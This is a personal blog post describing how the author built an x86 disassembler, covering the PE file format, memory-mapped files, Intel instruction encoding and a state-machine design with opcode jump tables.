Let me tell you, it was not an easy start. I had no clue where to even start. So I started reading up on the format of PE files. Found a very good resource online for this: Matt Pietrek's Explanation of the PE file format MSDN_Mag-Feb2002. I got stuck at one point trying to learn how to find where the code section actually begins in the binary. This article helped a lot in solving my doubts. That link also has some amazing work on x86 assembly and reverse engineering. One must also know about memory mapped files. It comes in very handy when reading files in which you must read data randomly instead of in a sequential way. Memory mapping is achieved with the help of the OS. What it does is it maps the file from the hard disk to virtual memory pages to the process that maps the file. Now the user process can access the file contents just the way it accesses memory locations via a pointer.

I then started reading the Intel SW Developers Manuals which gives a huge amount of information on the processor architecture and more importantly the Instruction Set Architecture (ISA). Volume2 describes the instruction format that is used by the Intel processors and detailed encoding of each and every assembly instruction. Since instructions in the x86 ISA has variable encoding lengths it takes some effort to achieve a successful disassembly. When going through the ISA, one might think that the instructions have random opcodes without any particular format to it but that is far from the truth. Take a look at this document which graphically depicts the opcodes of all instructions. Even though the instructions are encoded into different sizes, it is easy to disassemble using the general instruction format given below.

 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 | [Prefix] |  Opcode  | [ModR/M] |  [SIB]  |   [Disp]   |   [Imm]    |
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     <= 4   | 1/2byte  |  1byte   | 0/1byte | 1/2/4bytes | 1/2/4bytes |
    1 byte  |
     each   |

Using the above format, we can start processing at the very first byte of the code section by checking whether it is a prefix/opcode and moving on from there. The state machine below gives a more accurate picture about the disassembly process. Links to source code & binaries of my disassembler is posted in the Code Section. Look at the code and you will get a better understanding of the whole thing.

The ERROR state may be entered from any other state because of disassembly errors like starting disassembly from the middle of an instruction or may be an instruction that is not supported yet. If you look at the source code, there are about 9k LOC (with comments) for just the disassembly engine. This may sound too much but it is only because of different instructions. The logic is the same in processing all instructions(opcode handlers). Only thing is to determine which state to go to next by looking at the current information. There are a lot of if-else conditions to be checked because what the next byte means depends on what has been processed until now. The main part of disassembly, the opcode processing, is easily done using jump tables - I have used an array of function pointers that store addresses of the opcode handler functions and I can call the appropriate function by a simple table lookup when the opcode byte is read.

It was a completely involving experience to work on this project, about one and a half months of summer time gone by in a flash of frantic coding! The very first time that I tested the code and saw a small snippet of the disassembler output on the geeky green color console window, I was elated, and eager to do more and complete the project. There is no better way than coding to kill time!

Ring0 - The Inner Circle

Pages